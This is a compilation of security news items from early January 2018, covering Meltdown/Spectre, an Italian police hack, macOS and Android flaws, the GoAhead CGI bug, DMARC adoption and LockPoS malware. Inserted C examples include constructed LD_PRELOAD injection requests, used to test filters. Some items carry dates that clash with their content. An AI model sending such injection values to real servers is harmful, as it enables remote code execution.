The following statements were provided to us regarding this issue by the vendors to whom Project Zero disclosed this vulnerability:
Intel
No current statement provided at this time.
AMD
AMD provided the following link: http://www.amd.com/en/corporate/speculative-execution
ARM
Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.
Literature
Note that some of these documents - in particular Intel's documentation - change over time, so quotes from and references to it may not reflect the latest version of Intel's documentation.

https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel's optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
"Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems."
"Loads can:[...]Be carried out speculatively, before preceding branches are resolved."
"Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition."
"if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches"
"Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch)."
https://software.intel.com/en-us/articles/intel-sdm: Intel's Software Developer Manuals
http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog's documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm's research based on this provided the basic idea behind variant 2.
https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
https://www.sophia.re/thesis.pdf: Sophia D'Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
https://www.jilp.org/: This journal contains many articles on branch prediction.
http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel's Ivy Bridge architecture.


Anonymous Italia hacked speed camera database and took over the police systems in Correggio
4.1.2017 securityaffairs Hacking

Anonymous Italy hacked and deleted the entire speed camera database and took over the police email and database system in Correggio.
Last week, Anonymous hacked a speed camera database in Italy: the hacktivists took control of a local police computer system in Correggio, Italy, and erased the entire archive containing speed camera tickets. According to Gazzetta di Reggio, the hackers also released internal emails and documents.


The hackers provided screenshots of the attack to several Italian newspapers; it seems they wiped an entire archive containing 40 gigabytes' worth of infringement photographs.


The Anonymous hackers sent a message using the e-mail account of the Correggio municipal police.

“Ho Ho Ho, Merry Christmas,” read the message from Anonymous.

The message announced the hack of the Concilia database and of the system developed by the company Verbatel; it also included the links and passwords needed to download them.

The message includes screenshots of the hack; one of them shows a Windows command line, likely from the hacked computer of the Correggio municipal police.

Two images show claims from two motorists complaining that they received tickets from Correggio speed cameras, even though they had never passed through the area.

Emails between police administrators and local politicians discussed how the speed camera profits were to be distributed.

One of the screenshots shows an email sent by an employee of the Correggio data center, who explains that he restored the Concilia DB from a backup dated Dec. 5 because of a serious problem.

The police are still investigating the case.


Meltdown and Spectre CPU Flaws Affect Intel, ARM, AMD Processors
4.1.2017 thehackernews
Vulnerability

Unlike the initial reports, which suggested only Intel chips were vulnerable to some severe ‘memory leaking’ flaws, full technical details about the vulnerabilities have now emerged, revealing that almost every modern processor since 1995 is vulnerable to the issues.
Disclosed today by Google Project Zero, the vulnerabilities potentially impact all major CPUs, including those from AMD, ARM, and Intel—threatening almost all PCs, laptops, tablets, and smartphones, regardless of manufacturer or operating system.
These hardware vulnerabilities have been categorized into two attacks, named Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could allow attackers to steal sensitive data which is currently processed on the computer.
Both attacks take advantage of a feature in chips known as "speculative execution," a technique used by most modern CPUs to optimize performance.
"In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions," Project Zero says.
Therefore, it is possible for such speculative execution to have "side effects which are not restored when the CPU state is unwound and can lead to information disclosure," which can be accessed using side-channel attacks.
Meltdown Attack

The first issue, Meltdown (paper), allows attackers to read not only kernel memory but also the entire physical memory of the target machines, and therefore all secrets of other programs and the operating system.
“Meltdown is a related microarchitectural attack which exploits out-of-order execution in order to leak the target’s physical memory.”
Meltdown uses speculative execution to break the isolation between user applications and the operating system, allowing any application to access all system memory, including memory allocated for the kernel.
“Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively executed instructions can bypass memory protection.”
Nearly all desktop, laptop, and cloud computers are affected by Meltdown.
Spectre Attack

The second problem, Spectre (paper), is not easy to patch and will haunt people for quite some time, since fully mitigating this issue requires changes to processor architecture.
The Spectre attack breaks the isolation between different applications, allowing an attacker-controlled program to trick error-free programs into leaking their secrets by forcing them to access arbitrary portions of their own memory, which can then be read through a side channel.
Spectre attacks can be used to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.
“In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.” the paper explains.
“KAISER patch, which has been widely applied as a mitigation to the Meltdown attack, does not protect against Spectre.”
According to researchers, this vulnerability impacts almost every system, including desktops, laptops, cloud servers, as well as smartphones—powered by Intel, AMD, and ARM chips.
What You Should Do: Mitigations And Patches
Many vendors have security patches available for one or both of these attacks.
Windows — Microsoft has issued an out-of-band patch update for Windows 10, while other versions of Windows will be patched on the traditional Patch Tuesday on January 9, 2018.
MacOS — Apple had already fixed most of these security holes in macOS High Sierra 10.13.2 last month, but MacOS 10.13.3 will enhance or complete these mitigations.
Linux — Linux kernel developers have also released patches by implementing kernel page-table isolation (KPTI) to move the kernel into an entirely separate address space.
Android — Google has released security patches for Pixel/Nexus users as part of the Android January security patch update. Other users have to wait for their device manufacturers to release a compatible security update.
Mitigations for Chrome Users
Since this exploit can be executed through a website, Chrome users can turn on the Site Isolation feature on their devices to mitigate these flaws.
Here's how to turn on Site Isolation on Windows, Mac, Linux, Chrome OS or Android:
Copy chrome://flags/#enable-site-per-process and paste it into the URL field at the top of your Chrome web browser, and then hit the Enter key.
Look for Strict Site Isolation, then click the box labeled Enable.
Once done, hit Relaunch Now to relaunch your Chrome browser.
There is no single fix for both the attacks since each requires protection independently.


Huge Flaws Affect Nearly Every Modern Device; Patch Could Hit CPU Performance
4.1.2017 thehackernews
Vulnerability


UPDATE: Researchers have finally disclosed complete technical details of two kernel side-channel attacks, Meltdown and Spectre—which affect not only Intel but also systems and devices running AMD, ARM processors—allowing attackers to steal sensitive data from the system memory.
____________
The first week of the new year has not yet been completed, and very soon a massive vulnerability is going to hit hundreds of millions of Windows, Linux, and Mac users worldwide.
According to a blog post published yesterday, the core team of Linux kernel development has prepared a critical kernel update without releasing much information about the vulnerability.
Multiple researchers on Twitter confirmed that Intel processors (x86-64) have a severe hardware-level issue that could allow attackers to access protected kernel memory, which primarily includes information like passwords, login keys, and files cached from disk.
The security patch implements kernel page-table isolation (KPTI) to move the kernel into an entirely separate address space and keeps it protected and inaccessible from running programs and userspace, which requires an update at the operating system level.
"The purpose of the series is conceptually simple: to prevent a variety of attacks by unmapping as much of the Linux kernel from the process page table while the process is running in user space, greatly hindering attempts to identify kernel virtual address ranges from unprivileged userspace code," writes Python Sweetness.
It is noteworthy that installing the update will negatively affect your system speed and could bring down CPU performance by 5 percent to 30 percent, "depending on the task and processor model."
"With the page table splitting patches merged, it becomes necessary for the kernel to flush these caches every time the kernel begins executing, and every time user code resumes executing."
Most details of the flaw have been kept under wraps for now, but given the secrecy, some researchers have also speculated that a JavaScript program running in a web browser could recover sensitive kernel-protected data.
AMD processors are not affected by the vulnerability due to security protections that the company has in place, said Tom Lendacky, a member of the Linux OS group at AMD.
"AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against," the company said.
"The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault."
The Linux patch, which is being released for ALL x86 processors, also covers AMD processors, which the mainline Linux kernel has likewise treated as insecure; AMD, however, specifically recommends not enabling the patch on its processors.
Microsoft is likely to fix the issue for its Windows operating system in an upcoming Patch Tuesday, and Apple is also likely working on a patch to address the vulnerability.


Intel, AMD Chip Vulnerabilities Put Billions of Devices at Risk
4.1.2018 securityweek
Attack
Details of "Meltdown" and "Spectre" Attacks Against Intel and AMD Chips Disclosed

Researchers have disclosed technical details of two new attack methods that exploit critical flaws in CPUs from Intel, AMD and other vendors. They claim billions of devices are vulnerable, allowing malicious actors to gain access to passwords and other sensitive data without leaving a trace.

There have been reports in the past few days about a critical flaw in Intel CPUs that allows an attacker to gain access to kernel space memory. It turns out that there are actually two different attacks and researchers say one of them impacts AMD and ARM processors as well.

AMD representatives have claimed that their products are not vulnerable, which has contributed to the company’s stock going up 7 percent. Intel released a statement saying that the vulnerabilities are not unique to its products after its shares lost 4 percent in value.

Meltdown and Spectre

The side-channel attacks, dubbed Meltdown and Spectre by researchers, allow malicious applications installed on a device to access data as it’s being processed. This can include passwords stored in a password manager or web browser, photos, documents, emails, and data from instant messaging apps.

Attacks can be launched not only against PCs, but also mobile devices and cloud servers. While there is no evidence of exploitation in the wild, researchers pointed out that the attacks don’t leave any traces in traditional log files and they are unlikely to be detected by security products – although security products may detect the malware that launches Meltdown and Spectre.

Meltdown was discovered independently by Jann Horn of Google Project Zero, researchers from Cyberus Technology, and a team from the Graz University of Technology in Austria. Spectre was found independently by Horn, and a group of experts from various universities and companies. Technical papers and proof-of-concept (PoC) code have been published for each of the attack methods, and Intel, Microsoft, ARM and Google Project Zero are expected to publish their own advisories.

Memory isolation mechanisms found in modern computer systems should normally prevent applications from reading or writing to kernel memory or accessing the memory of other programs. However, the Meltdown and Spectre attacks bypass these protections.

Meltdown

Meltdown, named so because it “melts” security boundaries normally enforced by hardware, can be leveraged to read arbitrary kernel memory locations. A malicious unprivileged app can use it to read memory associated with other programs and even virtual machines in cloud environments. The vulnerability behind Meltdown is tracked as CVE-2017-5754.

Researchers say it’s unclear if Meltdown affects ARM and AMD processors, but it has been confirmed to impact nearly every Intel processor made since 1995, specifically CPUs that implement a system known as out-of-order execution.

Spectre, on the other hand, has been confirmed to affect not just Intel, but also AMD and ARM processors. However, AMD claims there is a “near zero risk” to its processors due to their architecture.

Desktops, laptops, smartphones and cloud servers are impacted, but the vulnerability is more difficult to exploit compared to Meltdown.

The attack has been named Spectre because its root cause is speculative execution and it will “haunt us for quite some time” due to the fact that it’s not easy to fix. The CVE identifiers CVE-2017-5753 and CVE-2017-5715 have been assigned to Spectre.

Spectre

Spectre breaks isolation between different applications and it allows an attacker to trick programs that follow best practices to leak secrets stored in their memory.

“Meltdown breaks the mechanism that keeps applications from accessing arbitrary system memory. Consequently, applications can access system memory,” researchers explained. “Spectre tricks other applications into accessing arbitrary locations in their memory. Both attacks use side channels to obtain the information from the accessed memory location.”

Mitigations

Meltdown attacks can be prevented using kernel page table isolation (KPTI), a hardening technique designed to improve security by isolating the kernel space from user space memory. It’s based on the KAISER system developed last year by a team of researchers at Graz University.

KPTI has already been implemented in the Linux kernel and Microsoft has been working on a similar system for Windows. Apple is also said to be working on patches for macOS.

Cloud providers that use Intel CPUs and Xen paravirtualization are impacted. Amazon Web Services (AWS) and Microsoft Azure have been working on patches and they have informed customers that cloud instances will need to be rebooted in the upcoming days to apply security patches.

Google has addressed the vulnerabilities in its Cloud products and services. The company pointed out that while attacks are not easy to launch against Android devices, the latest Android security updates do provide additional protection.

Spectre attacks are more difficult to block. However, researchers say it’s possible to prevent specific known exploits using software patches.

Intel addresses concerns of performance penalties introduced by mitigations

Since KPTI has already been implemented in the Linux kernel before the disclosure – this actually led to experts figuring out that there was a serious vulnerability in Intel CPUs – several tests have been conducted to determine the impact of the mitigation on performance.

The researchers who developed the KAISER method reported a negative impact of only 0.28 percent on performance, but tests conducted now showed that performance penalties can reach as much as 30 percent, depending on what types of operations are being conducted.

Michael Schwarz, one of the researchers involved in the discovery of the Meltdown and Spectre vulnerabilities, has confirmed for SecurityWeek that there definitely can be a significant performance penalty for certain types of workloads.

“We ran some benchmarks on our initial KAISER implementation which showed only small performance impacts on modern CPUs. However, we guess that the performance penalties reported by other people (something between 5% - 30%) are realistic on older CPUs and unusual workload (e.g., many syscalls),” Schwarz said.

Intel has reassured customers that any performance impacts are workload-dependent and they should not be significant for the average user. Furthermore, the chip maker says performance impact will be mitigated over time.


Apple Working on Patch for New Year's Eve macOS Flaw
4.1.2018 securityweek Apple
Apple is aware of the macOS vulnerability disclosed by a researcher on New Year’s Eve and the company plans on patching it later this month.

A security expert who uses the online moniker Siguza has made public the details and proof-of-concept (PoC) code for a local privilege escalation vulnerability affecting all versions of the macOS operating system.

The flaw, which the researcher described as a “zero day,” allows a malicious application installed on the targeted system to execute arbitrary code and obtain root privileges.

Apple is working on patching the vulnerability and has shared some mitigation advice until the fix becomes available.

“Apple is committed to the security of our customers’ devices and data, and we plan to patch this issue in a software update later this month,” Apple said in a statement emailed to SecurityWeek. “Since exploiting the vulnerability requires a malicious app to be loaded on your Mac, we recommend downloading software only from trusted sources such as the Mac App Store.”

The flaw affects IOHIDFamily, a kernel extension designed for human interface devices (e.g. touchscreens and buttons). Siguza discovered that some security bugs in this component introduce a kernel read/write vulnerability, which he has dubbed IOHIDeous.

The exploit created by the hacker also disables the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security features.

The PoC exploit is not stealthy as it needs to force a logout of the legitimate user. However, the researcher said an attacker could design an exploit that is triggered when the targeted device is manually rebooted or shut down.

Some of the PoC code made available by Siguza only works on macOS High Sierra 10.13.1 and earlier, but the researcher believes it can be adapted for version 10.13.2 as well.

The vulnerability has been around since at least 2002, but it could actually be much older.

Siguza says he is not concerned that malicious actors will abuse his PoC exploit as the vulnerability is not remotely exploitable. The hacker claims he would have privately disclosed the flaw to Apple had it been remotely exploitable or if the tech giant’s bug bounty program covered macOS.


Google Patches Multiple Critical, High Risk Vulnerabilities in Android
4.1.2018 securityweek Android
Google patched several Critical and High severity vulnerabilities as part of its Android Security Bulletin for January 2018.

A total of 38 security flaws were resolved in the popular mobile OS this month, 20 as part of the 2018-01-01 security patch level and 18 in the 2018-01-05 security patch level. Five of the bugs were rated Critical and 33 were rated High risk.

Four of the vulnerabilities addressed with the 2018-01-01 security patch level were rated Critical, all of them remote code execution bugs. The remaining 16 issues resolved in this patch level were High risk elevation of privilege and denial of service vulnerabilities.

An elevation of privilege bug that Google patched in Android runtime could be exploited remotely to bypass user interaction requirements in order to gain access to additional permissions.

The most severe of the 15 vulnerabilities resolved in Media framework could allow an attacker using a specially crafted malicious file to execute arbitrary code within the context of a privileged process. These include 3 Critical remote code execution bugs, 4 High severity elevation of privilege issues, and 8 High risk denial of service flaws.

One other Critical remote code execution bug was patched in System, along with two High severity elevation of privilege flaws and one High risk denial of service vulnerability.

Only one of the flaws fixed with the 2018-01-05 security patch level was a Critical vulnerability. Along with 6 High severity flaws, it was affecting Qualcomm closed-source components.

The patch level also resolved a High risk denial of service issue in HTC components and High risk elevation of privilege bugs in LG components, Media framework, MediaTek components, and NVIDIA components (one in each).

The security patch level addressed three High severity elevation of privilege and one information disclosure bug in Kernel components, along with two High risk elevation of privilege vulnerabilities in Qualcomm components.

Google also resolved 46 vulnerabilities in Google devices as part of the Pixel / Nexus Security Bulletin—January 2018. Most of the flaws were rated Moderate severity, the exception being issues addressed in Media framework (some were rated Low risk and others were rated High severity on older Android versions).

Impacted components included Framework (1 vulnerability), Media framework (16 vulnerabilities), System (1 flaw), Broadcom components (1 issue), HTC components (1 flaw), Kernel components (7 bugs), MediaTek components (1 issue), and Qualcomm components (18 vulnerabilities).

In addition to patching security flaws, the security bulletin also addressed functionality issues on Pixel devices. The update adjusted the handling of key upgrades in keystore and improved stability and performance after installing an OTA.

On Google devices, all of these issues are fixed as part of the security patch levels of 2018-01-05 or later.


Devices Running GoAhead Web Server Prone to Remote Attacks
4.1.2018 securityweek
Attack
A vulnerability affecting all versions of the GoAhead web server prior to version 3.6.5 can be exploited to achieve remote code execution (RCE) on Internet of Things (IoT) devices.

GoAhead is a small web server used by numerous companies, including IBM, HP, Oracle, Boeing, D-Link, and Motorola. It is “deployed in hundreds of millions of devices and is ideal for the smallest of embedded devices,” according to its developer, EmbedThis.

A Shodan search shows the web server is currently present on over 700,000 Internet-connected devices.

However, not all of these devices are impacted by the remote code execution vulnerability. Tracked as CVE-2017-17562, it is triggered only under specific conditions: the device must run a *nix operating system, and the server must have CGI support enabled and use dynamically linked CGI executables.

Discovered by Elttam security researchers, the flaw is the “result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters.” If the aforementioned conditions are met, the behavior can be abused for remote code execution when combined with the glibc dynamic linker, using special variables such as LD_PRELOAD.

The security researchers discovered that the issue affects all versions of the GoAhead source since at least 2.5.0, with the optional CGI support enabled.

The bug resides in the cgiHandler function, “which starts by allocating an array of pointers for the envp argument of the new process, followed by initializing it with the key-value pairs taken from HTTP request parameters. Finally, the launchCgi function is called which forks and execve’s the CGI script,” Elttam explains.

While REMOTE_HOST and HTTP_AUTHORIZATION are filtered, the remaining parameters are considered trusted and are passed along unfiltered. Thus, an attacker can control arbitrary environment variables used in a new CGI process.

To resolve the issue, EmbedThis’s patch skips a set of special parameter names and prefixes every other parameter name with a static string, so that no request parameter can name a variable the dynamic linker or the shell interprets. According to Elttam, the patch holds even against parameters of the form a=b%00LD_PRELOAD%3D.
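The environment-building step described above, reduced to a stand-alone C program. This is an added example, not GoAhead’s own code: build_cgi_env turns a query string into the NAME=VALUE strings a forked CGI process would receive, once with the pre-3.6.5 filter the article describes (only REMOTE_HOST and HTTP_AUTHORIZATION dropped) and once with a hardened filter in the spirit of the fix. The skip list beyond those two names, the LD_ prefix check and the CGI_ prefix are assumptions standing in for the actual patch, which the article does not quote. The a=b%00LD_PRELOAD%3D probe is included to show what happens once a decoded NUL byte sits inside a value: C-string formatting keeps only the part before it.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ENV 32
#define MAX_LEN 256

/* Percent-decode srclen bytes of src into dst. A %00 becomes a real NUL byte
 * inside dst, which is what the a=b%00LD_PRELOAD%3D probe relies on. */
static void url_decode(const char *src, size_t srclen, char *dst, size_t dstsz)
{
    size_t n = 0;
    for (size_t i = 0; i < srclen && n + 1 < dstsz; i++) {
        if (src[i] == '%' && i + 2 < srclen &&
            isxdigit((unsigned char)src[i + 1]) && isxdigit((unsigned char)src[i + 2])) {
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            dst[n++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else {
            dst[n++] = (src[i] == '+') ? ' ' : src[i];
        }
    }
    dst[n] = '\0';
}

/* Pre-3.6.5 behaviour as the article describes it: only two names dropped. */
static int dropped_by_old_filter(const char *name)
{
    return strcmp(name, "REMOTE_HOST") == 0 || strcmp(name, "HTTP_AUTHORIZATION") == 0;
}

/* Hardened filter. The list is an assumption for this example: the two original
 * names, variables the shell honours, and the LD_ namespace the loader reads. */
static int dropped_by_hardened_filter(const char *name)
{
    static const char *blocked[] = { "REMOTE_HOST", "HTTP_AUTHORIZATION", "IFS", "CDPATH", "PATH", NULL };
    for (int i = 0; blocked[i]; i++)
        if (strcmp(name, blocked[i]) == 0) return 1;
    return strncmp(name, "LD_", 3) == 0;
}

/* Turn "k=v&k2=v2" into the "NAME=VALUE" strings an execve'd CGI would get.
 * hardened selects the filter and adds a static prefix (assumed "CGI_"), so a
 * request parameter can never name a variable the loader or shell reads. */
static int build_cgi_env(const char *query, int hardened, char out[][MAX_LEN], int max_out)
{
    int n = 0;
    const char *p = query;
    while (*p && n < max_out) {
        const char *end = strchr(p, '&');
        size_t pairlen = end ? (size_t)(end - p) : strlen(p);
        const char *eq = memchr(p, '=', pairlen);
        size_t namelen = eq ? (size_t)(eq - p) : pairlen;
        char name[MAX_LEN], value[MAX_LEN] = "";
        url_decode(p, namelen, name, sizeof name);
        if (eq) url_decode(eq + 1, pairlen - namelen - 1, value, sizeof value);
        int drop = hardened ? dropped_by_hardened_filter(name) : dropped_by_old_filter(name);
        if (name[0] != '\0' && !drop) {
            /* %s stops at the first NUL, as the server's own formatting would,
             * so a value of "b\0LD_PRELOAD=..." contributes only "b". */
            snprintf(out[n++], MAX_LEN, "%s%s=%s", hardened ? "CGI_" : "", name, value);
        }
        p = end ? end + 1 : p + pairlen;
    }
    return n;
}

/* Would the child process see anything in the loader's LD_ namespace? */
static int env_reaches_loader(char env[][MAX_LEN], int n)
{
    for (int i = 0; i < n; i++)
        if (strncmp(env[i], "LD_", 3) == 0) return 1;
    return 0;
}

static int loader_reachable(const char *query, int hardened)
{
    char env[MAX_ENV][MAX_LEN];
    int n = build_cgi_env(query, hardened, env, MAX_ENV);
    return env_reaches_loader(env, n);
}

static int first_entry_is(const char *query, int hardened, const char *expect)
{
    char env[MAX_ENV][MAX_LEN];
    return build_cgi_env(query, hardened, env, MAX_ENV) > 0 && strcmp(env[0], expect) == 0;
}

int main(void)
{
    const char *probe = "LD_PRELOAD=/tmp/evil.so&name=x";   /* constructed request, not a real one */
    printf("old filter: loader reachable = %d\n", loader_reachable(probe, 0));
    printf("hardened:   loader reachable = %d\n", loader_reachable(probe, 1));
    return 0;
}
```

With the old filter the constructed request LD_PRELOAD=/tmp/evil.so&name=x produces an LD_PRELOAD entry that the dynamic linker in the child would honour; with the hardened filter the same request yields only CGI_name=x. The NUL probe a=b%00LD_PRELOAD%3D/tmp/evil.so collapses to CGI_a=b either way, because the entry is built as a C string. Compile with cc -std=c11 and run to see both results.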

The issue, the researchers say, could exist in other services as well, not only in GoAhead web servers compiled with CGI support enabled.

“Although the CGI handling code remained relatively stable in all versions of the web server (which made it the ideal target), there has been a significant amount of code churn over the years in other modules. It’s possible there are other interesting vulnerabilities [in the web server],” Elttam concludes.


DMARC Implemented on Half of U.S. Government Domains
4.1.2018 securityweek Safety
Government agencies in the United States have made progress in the implementation of the DMARC standard in response to a Department of Homeland Security (DHS) directive, but the first deadline is less than two weeks away.

The Binding Operational Directive (BOD) 18-01 issued by the DHS in mid-October instructs all federal agencies to start using web and email security technologies such as HTTPS, STARTTLS and DMARC.

DMARC (Domain-based Message Authentication, Reporting and Conformance) is an email authentication, policy, and reporting protocol designed to detect and prevent email spoofing. Organizations can set the DMARC policy to “none” in order to only monitor unauthenticated emails, “quarantine” to send them to the spam or junk folder, or “reject” to completely block their delivery.

The DHS has ordered government agencies to implement DMARC with at least a “none” policy by January 15. Organizations will then need to set their DMARC policy to “reject” within one year.
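As an added example (not from the article, Agari or the DHS), here is a small C parser that classifies a _dmarc TXT record the way a receiving mail server would, so a monitoring-only deployment can be told apart from an enforcing one. The records are constructed for the example. The handling of a missing p tag follows RFC 7489 section 6.6.3 (a record with a rua address but no valid p is treated as p=none), and the dmarc_enforcing definition, which treats pct=0 as monitoring, is this example’s own reading of what the directive’s “reject” goal requires rather than anything BOD 18-01 spells out.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef enum { DMARC_INVALID = 0, DMARC_NONE, DMARC_QUARANTINE, DMARC_REJECT } dmarc_policy;

typedef struct {
    dmarc_policy p;   /* policy for mail claiming to be from the domain itself */
    dmarc_policy sp;  /* subdomain policy; inherits p when absent */
    int pct;          /* share of failing mail the policy applies to; 100 when absent */
    int has_rua;      /* an aggregate-report (rua) mailto: address is present */
} dmarc_record;

static char *trim(char *s)
{
    while (isspace((unsigned char)*s)) s++;
    char *e = s + strlen(s);
    while (e > s && isspace((unsigned char)e[-1])) *--e = '\0';
    return s;
}

static void lower(char *s)
{
    for (; *s; s++) *s = (char)tolower((unsigned char)*s);
}

static dmarc_policy policy_value(char *v)
{
    lower(v);
    if (strcmp(v, "none") == 0) return DMARC_NONE;
    if (strcmp(v, "quarantine") == 0) return DMARC_QUARANTINE;
    if (strcmp(v, "reject") == 0) return DMARC_REJECT;
    return DMARC_INVALID;
}

/* Parse one _dmarc TXT record. Returns 1 when a receiver would act on it and
 * 0 when RFC 7489 says to ignore it (v=DMARC1 not first, malformed tag, or
 * no usable policy). Tag names are case-folded; the v value must match exactly. */
static int dmarc_parse(const char *txt, dmarc_record *r)
{
    char buf[512];
    int first = 1;
    if (strlen(txt) >= sizeof buf) return 0;
    strcpy(buf, txt);
    memset(r, 0, sizeof *r);
    r->pct = 100;
    for (char *tag = strtok(buf, ";"); tag; tag = strtok(NULL, ";")) {
        tag = trim(tag);
        if (*tag == '\0') continue;              /* trailing ';' */
        char *eq = strchr(tag, '=');
        if (!eq) return 0;                       /* malformed tag */
        *eq = '\0';
        char *name = trim(tag), *val = trim(eq + 1);
        lower(name);
        if (first) {                             /* v=DMARC1 must be the first tag */
            if (strcmp(name, "v") != 0 || strcmp(val, "DMARC1") != 0) return 0;
            first = 0;
            continue;
        }
        if (strcmp(name, "p") == 0)        r->p = policy_value(val);
        else if (strcmp(name, "sp") == 0)  r->sp = policy_value(val);
        else if (strcmp(name, "pct") == 0) r->pct = isdigit((unsigned char)*val) ? atoi(val) : 100;
        else if (strcmp(name, "rua") == 0) r->has_rua = strncmp(val, "mailto:", 7) == 0;
        /* adkim, aspf, ruf, fo, rf, ri and unknown tags do not change disposition */
    }
    if (first) return 0;                         /* empty record */
    if (r->p == DMARC_INVALID) {
        if (!r->has_rua) return 0;
        r->p = DMARC_NONE;                       /* RFC 7489 s6.6.3: rua but no p -> p=none */
    }
    if (r->sp == DMARC_INVALID) r->sp = r->p;
    if (r->pct < 0 || r->pct > 100) r->pct = 100;
    return 1;
}

/* Disposition a receiver applies to failing mail from the domain itself. */
static dmarc_policy dmarc_effective_policy(const char *txt)
{
    dmarc_record r;
    return dmarc_parse(txt, &r) ? r.p : DMARC_INVALID;
}

static dmarc_policy dmarc_subdomain_policy(const char *txt)
{
    dmarc_record r;
    return dmarc_parse(txt, &r) ? r.sp : DMARC_INVALID;
}

/* Enforcing, for this example's purposes: failing mail is really quarantined
 * or rejected. p=reject with pct=0 is still monitoring in practice. */
static int dmarc_enforcing(const char *txt)
{
    dmarc_record r;
    return dmarc_parse(txt, &r) && r.p >= DMARC_QUARANTINE && r.pct > 0;
}

int main(void)
{
    /* Constructed records, not real agency DNS data; in practice fetch the
     * TXT record for _dmarc.<domain> (e.g. dig +short txt _dmarc.example.gov). */
    const char *records[] = {
        "v=DMARC1; p=none; rua=mailto:dmarc@example.gov",
        "v=DMARC1; p=reject; sp=quarantine; pct=100; rua=mailto:dmarc@example.gov",
        "v=DMARC1; rua=mailto:dmarc@example.gov",
        "p=reject; v=DMARC1",
        "v=DMARC1; p=reject; pct=0",
    };
    static const char *names[] = { "ignored", "none", "quarantine", "reject" };
    for (size_t i = 0; i < sizeof records / sizeof records[0]; i++)
        printf("%-72s -> p=%s sp=%s%s\n", records[i], names[dmarc_effective_policy(records[i])],
               names[dmarc_subdomain_policy(records[i])], dmarc_enforcing(records[i]) ? " (enforcing)" : "");
    return 0;
}
```

Two of the constructed records are the ones worth noticing in an audit: the record that has a rua address but no p tag still counts as “DMARC implemented” in the p=none sense, and a p=reject record with pct=0 parses as reject while enforcing nothing.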

A few days after the DHS made the announcement, security firm Agari checked over 1,000 domains owned by federal agencies and found that only 18% had implemented DMARC. By mid-November the share had increased to 34%, and in December it reached 47%.

However, only 16% of them had deployed “quarantine” or “reject” policies by December, an increase of two percentage points compared to the previous month.

[Image: DMARC adoption in US government]

More than 20 agencies have fully implemented DMARC, including the Federal Communications Commission (FCC), the Federal Trade Commission (FTC), the Senate, the Postal Service, the Department of Health and Human Services (HHS), and Department of Veterans Affairs.

The HHS has deployed DMARC across more than 100 of its domains, including ones used by Healthcare.gov, the National Institutes of Health (NIH), and the Centers for Disease Control and Prevention (CDC).

Agari said the overall email attack rate for government customers that had implemented DMARC dropped to less than one percent.

“Deploying a DMARC policy where p=none is simple, but it is only the first step,” Agari said in a report published on Tuesday. “To fully protect against phishing threats against both the federal government and the public at large (and maintain strong email governance), federal agencies must ultimately move to Quarantine and Reject policies.”


LockPoS Adopts New Injection Technique
4.1.2018 securityweek
Virus
The LockPoS Point-of-Sale (PoS) malware has been leveraging a new code injection technique to compromise systems, Cyberbit researchers say.

First detailed in July 2017, LockPoS steals credit card data from the memory of computers attached to PoS credit card scanners: it reads the memory of running processes, collects card data, and sends it to its command and control (C&C) server.

Previous analysis revealed that the threat used a dropper that injects it directly into the explorer.exe process. After execution, the dropper extracts a resource file from itself and injects various components that load the final LockPoS payload.

